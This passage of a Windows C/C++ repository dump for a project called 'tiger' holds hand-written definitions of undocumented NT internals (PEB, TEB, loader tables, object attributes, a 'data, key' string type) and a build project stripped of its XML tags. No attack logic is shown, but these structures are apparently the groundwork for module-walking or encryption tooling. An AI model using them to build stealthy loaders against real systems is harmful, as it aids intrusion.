312 | { 313 | struct 314 | { 315 | USHORT SpareCrossTebFlags : 16; 316 | }; 317 | USHORT CrossTebFlags; 318 | }; 319 | union 320 | { 321 | struct 322 | { 323 | USHORT DbgSafeThunkCall : 1; 324 | USHORT DbgInDebugPrint : 1; 325 | USHORT DbgHasFiberData : 1; 326 | USHORT DbgSkipThreadAttach : 1; 327 | USHORT DbgWerInShipAssertCode : 1; 328 | USHORT DbgIssuedInitialBp : 1; 329 | USHORT DbgClonedThread : 1; 330 | USHORT SpareSameTebBits : 9; 331 | }; 332 | USHORT SameTebFlags; 333 | }; 334 | PVOID TxnScopeEntercallback; 335 | PVOID TxnScopeExitCAllback; 336 | PVOID TxnScopeContext; 337 | ULONG LockCount; 338 | ULONG ProcessRundown; 339 | ULONG64 LastSwitchTime; 340 | ULONG64 TotalSwitchOutTime; 341 | LARGE_INTEGER WaitReasonBitMap; 342 | #else 343 | BOOLEAN SafeThunkCall; 344 | BOOLEAN BooleanSpare[3]; 345 | #endif 346 | } TEB, * PTEB; 347 | 348 | typedef struct _LDR_DATA_TABLE_ENTRY { 349 | LIST_ENTRY InLoadOrderLinks; 350 | LIST_ENTRY InMemoryOrderLinks; 351 | LIST_ENTRY InInitializationOrderLinks; 352 | PVOID DllBase; 353 | PVOID EntryPoint; 354 | ULONG SizeOfImage; 355 | UNICODE_STRING FullDllName; 356 | UNICODE_STRING BaseDllName; 357 | ULONG Flags; 358 | WORD LoadCount; 359 | WORD TlsIndex; 360 | union { 361 | LIST_ENTRY HashLinks; 362 | struct { 363 | PVOID SectionPointer; 364 | ULONG CheckSum; 365 | }; 366 | }; 367 | union { 368 | ULONG TimeDateStamp; 369 | PVOID LoadedImports; 370 | }; 371 | PACTIVATION_CONTEXT EntryPointActivationContext; 372 | PVOID PatchInformation; 373 | LIST_ENTRY ForwarderLinks; 374 | LIST_ENTRY ServiceTagLinks; 375 | LIST_ENTRY StaticLinks; 376 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 377 | 378 | // Object attributes 379 | #define OBJ_INHERIT 0x00000002 380 | #define OBJ_PERMANENT 0x00000010 381 | #define OBJ_EXCLUSIVE 0x00000020 382 | #define OBJ_CASE_INSENSITIVE 0x00000040 383 | #define OBJ_OPENIF 0x00000080 384 | #define OBJ_OPENLINK 0x00000100 385 | #define OBJ_KERNEL_HANDLE 0x00000200 386 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400 387 | #define OBJ_VALID_ATTRIBUTES 0x000007f2 388 | 389 | typedef struct _OBJECT_ATTRIBUTES { 390 | ULONG Length; 391 | PVOID RootDirectory; 392 | PUNICODE_STRING ObjectName; 393 | ULONG Attributes; 394 | PVOID SecurityDescriptor; 395 | PVOID SecurityQualityOfService; 396 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 397 | 398 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 399 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 400 | (p)->RootDirectory = r; \ 401 | (p)->Attributes = a; \ 402 | (p)->ObjectName = n; \ 403 | (p)->SecurityDescriptor = s; \ 404 | (p)->SecurityQualityOfService = NULL; \ 405 | } 406 | 407 | #define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) { sizeof(OBJECT_ATTRIBUTES), NULL, n, a, NULL, NULL } 408 | #define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) 409 | 410 | typedef struct _INITIAL_TEB { 411 | PVOID StackBase; 412 | PVOID StackLimit; 413 | PVOID StackCommit; 414 | PVOID StackCommitMax; 415 | PVOID StackReserved; 416 | } INITIAL_TEB, * PINITIAL_TEB; 417 | 418 | /* 419 | typedef struct _WTS_PROCESS_INFOW { 420 | DWORD SessionId; 421 | DWORD ProcessId; 422 | LPWSTR pProcessName; 423 | PSID pUserSid; 424 | } WTS_PROCESS_INFOW, * PWTS_PROCESS_INFOW; 425 | 426 | typedef struct _WTS_PROCESS_INFOA { 427 | DWORD SessionId; 428 | DWORD ProcessId; 429 | LPSTR pProcessName; 430 | PSID pUserSid; 431 | } WTS_PROCESS_INFOA, * PWTS_PROCESS_INFOA; 432 | 433 | #ifdef UNICODE 434 | #define WTS_PROCESS_INFO WTS_PROCESS_INFOW 435 | #define PWTS_PROCESS_INFO PWTS_PROCESS_INFOW 436 | #else 437 | #define WTS_PROCESS_INFO WTS_PROCESS_INFOA 438 | #define PWTS_PROCESS_INFO PWTS_PROCESS_INFOA 439 | #endif 440 | */ -------------------------------------------------------------------------------- /tiger/structs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #pragma warning (disable : 4005) // Disable macro redefition warnings 3 | #include 4 | 5 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 6 | 7 | /*===================================================================== 8 | STRUCTURES 9 | ======================================================================*/ 10 | 11 | typedef struct ustring { 12 | SIZE_T Length; 13 | SIZE_T MaximumLength; 14 | PUCHAR Buffer; 15 | } data, key; 16 | 17 | typedef struct _LSA_UNICODE_STRING { 18 | USHORT Length; 19 | USHORT MaximumLength; 20 | PWSTR Buffer; 21 | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING,* PUNICODE_STR; 22 | 23 | typedef struct _LDR_MODULE { 24 | LIST_ENTRY InLoadOrderModuleList; 25 | LIST_ENTRY InMemoryOrderModuleList; 26 | LIST_ENTRY InInitializationOrderModuleList; 27 | PVOID BaseAddress; 28 | PVOID EntryPoint; 29 | ULONG SizeOfImage; 30 | UNICODE_STRING FullDllName; 31 | UNICODE_STRING BaseDllName; 32 | ULONG Flags; 33 | SHORT LoadCount; 34 | SHORT TlsIndex; 35 | LIST_ENTRY HashTableEntry; 36 | ULONG TimeDateStamp; 37 | } LDR_MODULE, * PLDR_MODULE; 38 | 39 | typedef struct _PEB_LDR_DATA { 40 | ULONG Length; 41 | ULONG Initialized; 42 | PVOID SsHandle; 43 | LIST_ENTRY InLoadOrderModuleList; 44 | LIST_ENTRY InMemoryOrderModuleList; 45 | LIST_ENTRY InInitializationOrderModuleList; 46 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 47 | 48 | typedef struct _RTL_BITMAP 49 | { 50 | ULONG SizeOfBitMap; 51 | ULONG* Buffer; 52 | } RTL_BITMAP, * PRTL_BITMAP; 53 | 54 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 55 | 56 | USHORT Flags; 57 | USHORT Length; 58 | ULONG TimeStamp; 59 | UNICODE_STRING DosPath; 60 | 61 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 62 | 63 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 64 | 65 | ULONG MaximumLength; 66 | ULONG Length; 67 | ULONG Flags; 68 | ULONG DebugFlags; 69 | PVOID ConsoleHandle; 70 | ULONG ConsoleFlags; 71 | HANDLE StdInputHandle; 72 | HANDLE StdOutputHandle; 73 | HANDLE StdErrorHandle; 74 | UNICODE_STRING CurrentDirectoryPath; 75 | HANDLE CurrentDirectoryHandle; 76 | UNICODE_STRING DllPath; 77 | UNICODE_STRING ImagePathName; 78 | UNICODE_STRING CommandLine; 79 | PVOID Environment; 80 | ULONG StartingPositionLeft; 81 | ULONG StartingPositionTop; 82 | ULONG Width; 83 | ULONG Height; 84 | ULONG CharWidth; 85 | ULONG CharHeight; 86 | ULONG ConsoleTextAttributes; 87 | ULONG WindowFlags; 88 | ULONG ShowWindowFlags; 89 | UNICODE_STRING WindowTitle; 90 | UNICODE_STRING DesktopName; 91 | UNICODE_STRING ShellInfo; 92 | UNICODE_STRING RuntimeData; 93 | RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20]; 94 | 95 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 96 | 97 | typedef struct _PEB 98 | { 99 | BOOLEAN InheritedAddressSpace; 100 | BOOLEAN ReadImageFileExecOptions; 101 | BOOLEAN BeingDebugged; 102 | BOOLEAN SpareBool; 103 | HANDLE Mutant; 104 | HMODULE ImageBaseAddress; 105 | PPEB_LDR_DATA LdrData; 106 | RTL_USER_PROCESS_PARAMETERS* ProcessParameters; 107 | PVOID SubSystemData; 108 | HANDLE ProcessHeap; 109 | PRTL_CRITICAL_SECTION FastPebLock; 110 | PVOID FastPebLockRoutine; 111 | PVOID FastPebUnlockRoutine; 112 | ULONG EnvironmentUpdateCount; 113 | PVOID KernelCallbackTable; 114 | PVOID EventLogSection; 115 | PVOID EventLog; 116 | PVOID FreeList; 117 | ULONG TlsExpansionCounter; 118 | PRTL_BITMAP TlsBitmap; 119 | ULONG TlsBitmapBits[2]; 120 | PVOID ReadOnlySharedMemoryBase; 121 | PVOID ReadOnlySharedMemoryHeap; 122 | PVOID* ReadOnlyStaticServerData; 123 | PVOID AnsiCodePageData; 124 | PVOID OemCodePageData; 125 | PVOID UnicodeCaseTableData; 126 | ULONG NumberOfProcessors; 127 | ULONG NtGlobalFlag; 128 | BYTE Spare2[4]; 129 | LARGE_INTEGER CriticalSectionTimeout; 130 | ULONG HeapSegmentReserve; 131 | ULONG HeapSegmentCommit; 132 | ULONG HeapDeCommitTotalFreeThreshold; 133 | ULONG HeapDeCommitFreeBlockThreshold; 134 | ULONG NumberOfHeaps; 135 | ULONG MaximumNumberOfHeaps; 136 | PVOID* ProcessHeaps; 137 | PVOID GdiSharedHandleTable; 138 | PVOID ProcessStarterHelper; 139 | PVOID GdiDCAttributeList; 140 | PVOID LoaderLock; 141 | ULONG OSMajorVersion; 142 | ULONG OSMinorVersion; 143 | ULONG OSBuildNumber; 144 | ULONG OSPlatformId; 145 | ULONG ImageSubSystem; 146 | ULONG ImageSubSystemMajorVersion; 147 | ULONG ImageSubSystemMinorVersion; 148 | ULONG ImageProcessAffinityMask; 149 | ULONG GdiHandleBuffer[34]; 150 | ULONG PostProcessInitRoutine; 151 | PRTL_BITMAP TlsExpansionBitmap; 152 | ULONG TlsExpansionBitmapBits[32]; 153 | ULONG SessionId; 154 | 155 | } PEB, * PPEB; 156 | 157 | typedef struct __CLIENT_ID { 158 | HANDLE UniqueProcess; 159 | HANDLE UniqueThread; 160 | } CLIENT_ID, * PCLIENT_ID; 161 | 162 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT { 163 | ULONG Flags; 164 | PCHAR FrameName; 165 | } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT; 166 | 167 | typedef struct _TEB_ACTIVE_FRAME { 168 | ULONG Flags; 169 | struct _TEB_ACTIVE_FRAME* Previous; 170 | PTEB_ACTIVE_FRAME_CONTEXT Context; 171 | } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME; 172 | 173 | typedef struct _GDI_TEB_BATCH { 174 | ULONG Offset; 175 | ULONG HDC; 176 | ULONG Buffer[310]; 177 | } GDI_TEB_BATCH, * PGDI_TEB_BATCH; 178 | 179 | typedef PVOID PACTIVATION_CONTEXT; 180 | 181 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME { 182 | struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous; 183 | PACTIVATION_CONTEXT ActivationContext; 184 | ULONG Flags; 185 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME; 186 | 187 | typedef struct _ACTIVATION_CONTEXT_STACK { 188 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame; 189 | LIST_ENTRY FrameListCache; 190 | ULONG Flags; 191 | ULONG NextCookieSequenceNumber; 192 | ULONG StackId; 193 | } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK; 194 | 195 | typedef struct _TEB { 196 | NT_TIB NtTib; 197 | PVOID EnvironmentPointer; 198 | CLIENT_ID ClientId; 199 | PVOID ActiveRpcHandle; 200 | PVOID ThreadLocalStoragePointer; 201 | PPEB ProcessEnvironmentBlock; 202 | ULONG LastErrorValue; 203 | ULONG CountOfOwnedCriticalSections; 204 | PVOID CsrClientThread; 205 | PVOID Win32ThreadInfo; 206 | ULONG User32Reserved[26]; 207 | ULONG UserReserved[5]; 208 | PVOID WOW32Reserved; 209 | LCID CurrentLocale; 210 | ULONG FpSoftwareStatusRegister; 211 | PVOID SystemReserved1[54]; 212 | LONG ExceptionCode; 213 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 214 | PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer; 215 | UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)]; 216 | ULONG TxFsContext; 217 | #elif (NTDDI_VERSION >= NTDDI_WS03) 218 | PACTIVATION_CONTEXT_STACK ActivationContextStackPointer; 219 | UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)]; 220 | #else 221 | ACTIVATION_CONTEXT_STACK ActivationContextStack; 222 | UCHAR SpareBytes1[24]; 223 | #endif 224 | GDI_TEB_BATCH GdiTebBatch; 225 | CLIENT_ID RealClientId; 226 | PVOID GdiCachedProcessHandle; 227 | ULONG GdiClientPID; 228 | ULONG GdiClientTID; 229 | PVOID GdiThreadLocalInfo; 230 | PSIZE_T Win32ClientInfo[62]; 231 | PVOID glDispatchTable[233]; 232 | PSIZE_T glReserved1[29]; 233 | PVOID glReserved2; 234 | PVOID glSectionInfo; 235 | PVOID glSection; 236 | PVOID glTable; 237 | PVOID glCurrentRC; 238 | PVOID glContext; 239 | NTSTATUS LastStatusValue; 240 | UNICODE_STRING StaticUnicodeString; 241 | WCHAR StaticUnicodeBuffer[261]; 242 | PVOID DeallocationStack; 243 | PVOID TlsSlots[64]; 244 | LIST_ENTRY TlsLinks; 245 | PVOID Vdm; 246 | PVOID ReservedForNtRpc; 247 | PVOID DbgSsReserved[2]; 248 | #if (NTDDI_VERSION >= NTDDI_WS03) 249 | ULONG HardErrorMode; 250 | #else 251 | ULONG HardErrorsAreDisabled; 252 | #endif 253 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 254 | PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)]; 255 | GUID ActivityId; 256 | PVOID SubProcessTag; 257 | PVOID EtwLocalData; 258 | PVOID EtwTraceData; 259 | #elif (NTDDI_VERSION >= NTDDI_WS03) 260 | PVOID Instrumentation[14]; 261 | PVOID SubProcessTag; 262 | PVOID EtwLocalData; 263 | #else 264 | PVOID Instrumentation[16]; 265 | #endif 266 | PVOID WinSockData; 267 | ULONG GdiBatchCount; 268 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 269 | BOOLEAN SpareBool0; 270 | BOOLEAN SpareBool1; 271 | BOOLEAN SpareBool2; 272 | #else 273 | BOOLEAN InDbgPrint; 274 | BOOLEAN FreeStackOnTermination; 275 | BOOLEAN HasFiberData; 276 | #endif 277 | UCHAR IdealProcessor; 278 | #if (NTDDI_VERSION >= NTDDI_WS03) 279 | ULONG GuaranteedStackBytes; 280 | #else 281 | ULONG Spare3; 282 | #endif 283 | PVOID ReservedForPerf; 284 | PVOID ReservedForOle; 285 | ULONG WaitingOnLoaderLock; 286 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 287 | PVOID SavedPriorityState; 288 | ULONG_PTR SoftPatchPtr1; 289 | ULONG_PTR ThreadPoolData; 290 | #elif (NTDDI_VERSION >= NTDDI_WS03) 291 | ULONG_PTR SparePointer1; 292 | ULONG_PTR SoftPatchPtr1; 293 | ULONG_PTR SoftPatchPtr2; 294 | #else 295 | Wx86ThreadState Wx86Thread; 296 | #endif 297 | PVOID* TlsExpansionSlots; 298 | #if defined(_WIN64) && !defined(EXPLICIT_32BIT) 299 | PVOID DeallocationBStore; 300 | PVOID BStoreLimit; 301 | #endif 302 | ULONG ImpersonationLocale; 303 | ULONG IsImpersonating; 304 | PVOID NlsCache; 305 | PVOID pShimData; 306 | ULONG HeapVirtualAffinity; 307 | HANDLE CurrentTransactionHandle; 308 | PTEB_ACTIVE_FRAME ActiveFrame; 309 | #if (NTDDI_VERSION >= NTDDI_WS03) 310 | PVOID FlsData; 311 | #endif 312 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 313 | PVOID PreferredLangauges; 314 | PVOID UserPrefLanguages; 315 | PVOID MergedPrefLanguages; 316 | ULONG MuiImpersonation; 317 | union 318 | { 319 | struct 320 | { 321 | USHORT SpareCrossTebFlags : 16; 322 | }; 323 | USHORT CrossTebFlags; 324 | }; 325 | union 326 | { 327 | struct 328 | { 329 | USHORT DbgSafeThunkCall : 1; 330 | USHORT DbgInDebugPrint : 1; 331 | USHORT DbgHasFiberData : 1; 332 | USHORT DbgSkipThreadAttach : 1; 333 | USHORT DbgWerInShipAssertCode : 1; 334 | USHORT DbgIssuedInitialBp : 1; 335 | USHORT DbgClonedThread : 1; 336 | USHORT SpareSameTebBits : 9; 337 | }; 338 | USHORT SameTebFlags; 339 | }; 340 | PVOID TxnScopeEntercallback; 341 | PVOID TxnScopeExitCAllback; 342 | PVOID TxnScopeContext; 343 | ULONG LockCount; 344 | ULONG ProcessRundown; 345 | ULONG64 LastSwitchTime; 346 | ULONG64 TotalSwitchOutTime; 347 | LARGE_INTEGER WaitReasonBitMap; 348 | #else 349 | BOOLEAN SafeThunkCall; 350 | BOOLEAN BooleanSpare[3]; 351 | #endif 352 | } TEB, * PTEB; 353 | 354 | typedef struct _LDR_DATA_TABLE_ENTRY { 355 | LIST_ENTRY InLoadOrderLinks; 356 | LIST_ENTRY InMemoryOrderLinks; 357 | LIST_ENTRY InInitializationOrderLinks; 358 | PVOID DllBase; 359 | PVOID EntryPoint; 360 | ULONG SizeOfImage; 361 | UNICODE_STRING FullDllName; 362 | UNICODE_STRING BaseDllName; 363 | ULONG Flags; 364 | WORD LoadCount; 365 | WORD TlsIndex; 366 | union { 367 | LIST_ENTRY HashLinks; 368 | struct { 369 | PVOID SectionPointer; 370 | ULONG CheckSum; 371 | }; 372 | }; 373 | union { 374 | ULONG TimeDateStamp; 375 | PVOID LoadedImports; 376 | }; 377 | PACTIVATION_CONTEXT EntryPointActivationContext; 378 | PVOID PatchInformation; 379 | LIST_ENTRY ForwarderLinks; 380 | LIST_ENTRY ServiceTagLinks; 381 | LIST_ENTRY StaticLinks; 382 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 383 | 384 | // Object attributes 385 | #define OBJ_INHERIT 0x00000002 386 | #define OBJ_PERMANENT 0x00000010 387 | #define OBJ_EXCLUSIVE 0x00000020 388 | #define OBJ_CASE_INSENSITIVE 0x00000040 389 | #define OBJ_OPENIF 0x00000080 390 | #define OBJ_OPENLINK 0x00000100 391 | #define OBJ_KERNEL_HANDLE 0x00000200 392 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400 393 | #define OBJ_VALID_ATTRIBUTES 0x000007f2 394 | 395 | typedef struct _OBJECT_ATTRIBUTES { 396 | ULONG Length; 397 | PVOID RootDirectory; 398 | PUNICODE_STRING ObjectName; 399 | ULONG Attributes; 400 | PVOID SecurityDescriptor; 401 | PVOID SecurityQualityOfService; 402 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 403 | 404 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 405 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 406 | (p)->RootDirectory = r; \ 407 | (p)->Attributes = a; \ 408 | (p)->ObjectName = n; \ 409 | (p)->SecurityDescriptor = s; \ 410 | (p)->SecurityQualityOfService = NULL; \ 411 | } 412 | 413 | #define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) { sizeof(OBJECT_ATTRIBUTES), NULL, n, a, NULL, NULL } 414 | #define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) 415 | 416 | typedef struct _INITIAL_TEB { 417 | PVOID StackBase; 418 | PVOID StackLimit; 419 | PVOID StackCommit; 420 | PVOID StackCommitMax; 421 | PVOID StackReserved; 422 | } INITIAL_TEB, * PINITIAL_TEB; 423 | 424 | /* 425 | typedef struct _WTS_PROCESS_INFOW { 426 | DWORD SessionId; 427 | DWORD ProcessId; 428 | LPWSTR pProcessName; 429 | PSID pUserSid; 430 | } WTS_PROCESS_INFOW, * PWTS_PROCESS_INFOW; 431 | 432 | typedef struct _WTS_PROCESS_INFOA { 433 | DWORD SessionId; 434 | DWORD ProcessId; 435 | LPSTR pProcessName; 436 | PSID pUserSid; 437 | } WTS_PROCESS_INFOA, * PWTS_PROCESS_INFOA; 438 | 439 | #ifdef UNICODE 440 | #define WTS_PROCESS_INFO WTS_PROCESS_INFOW 441 | #define PWTS_PROCESS_INFO PWTS_PROCESS_INFOW 442 | #else 443 | #define WTS_PROCESS_INFO WTS_PROCESS_INFOA 444 | #define PWTS_PROCESS_INFO PWTS_PROCESS_INFOA 445 | #endif 446 | */ -------------------------------------------------------------------------------- /tiger/tiger.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | FinalDLLRelease 10 | Win32 11 | 12 | 13 | FinalDLLRelease 14 | x64 15 | 16 | 17 | FinalRelease 18 | Win32 19 | 20 | 21 | FinalRelease 22 | x64 23 | 24 | 25 | Release 26 | Win32 27 | 28 | 29 | Debug 30 | x64 31 | 32 | 33 | Release 34 | x64 35 | 36 | 37 | 38 | 17.0 39 | Win32Proj 40 | {a57491fb-d17e-4cc0-8ed9-90941322a55c} 41 | tiger 42 | 10.0 43 | 44 | 45 | 46 | Application 47 | true 48 | v143 49 | Unicode 50 | 51 | 52 | Application 53 | false 54 | v143 55 | true 56 | Unicode 57 | 58 | 59 | Application 60 | false 61 | v143 62 | true 63 | Unicode 64 | 65 | 66 | Application 67 | false 68 | v143 69 | true 70 | Unicode 71 | 72 | 73 | Application 74 | true 75 | v143 76 | Unicode 77 | 78 | 79 | Application 80 | false 81 | v143 82 | true 83 | Unicode 84 | 85 | 86 | Application 87 | false 88 | v143 89 | true 90 | Unicode 91 | 92 | 93 | DynamicLibrary 94 | false 95 | v143 96 | true 97 | Unicode 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | false 132 | 133 | 134 | false 135 | 136 | 137 | false 138 | 139 | 140 | 141 | Level3 142 | true 143 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 144 | true 145 | 146 | 147 | Console 148 | true 149 | 150 | 151 | 152 | 153 | Level3 154 | true 155 | true 156 | true 157 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 158 | true 159 | 160 | 161 | Console 162 | true 163 | true 164 | true 165 | 166 | 167 | 168 | 169 | Level3 170 | true 171 | true 172 | true 173 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 174 | true 175 | 176 | 177 | Console 178 | true 179 | true 180 | true 181 | 182 | 183 | 184 | 185 | Level3 186 | true 187 | true 188 | true 189 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 190 | true 191 | 192 | 193 | Console 194 | true 195 | true 196 | true 197 | 198 | 199 | 200 | 201 | Level3 202 | true 203 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 204 | true 205 | 206 | 207 | Console 208 | true 209 | 210 | 211 | 212 | 213 | Level3 214 | true 215 | true 216 | false 217 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 218 | true 219 | None 220 | Disabled 221 | false 222 | MultiThreaded 223 | None 224 | false 225 | 226 | 227 | Console 228 | false 229 | false 230 | false 231 | false 232 | UseLinkTimeCodeGeneration 233 | main 234 | true 235 | 236 | 237 | 238 | 239 | Level3 240 | true 241 | true 242 | false 243 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 244 | true 245 | Disabled 246 | false 247 | false 248 | MultiThreaded 249 | false 250 | 251 | 252 | Console 253 | false 254 | false 255 | false 256 | UseLinkTimeCodeGeneration 257 | main 258 | true 259 | true 260 | 261 | 262 | false 263 | 264 | 265 | 266 | 267 | Level3 268 | true 269 | true 270 | false 271 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 272 | true 273 | Disabled 274 | false 275 | false 276 | MultiThreaded 277 | false 278 | 279 | 280 | Windows 281 | false 282 | false 283 | false 284 | UseLinkTimeCodeGeneration 285 | 286 | 287 | true 288 | true 289 | true 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | 306 | 307 | 308 | 309 | 310 | 311 | 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 334 | false 335 | false 336 | true 337 | true 338 | false 339 | true 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | --------------------------------------------------------------------------------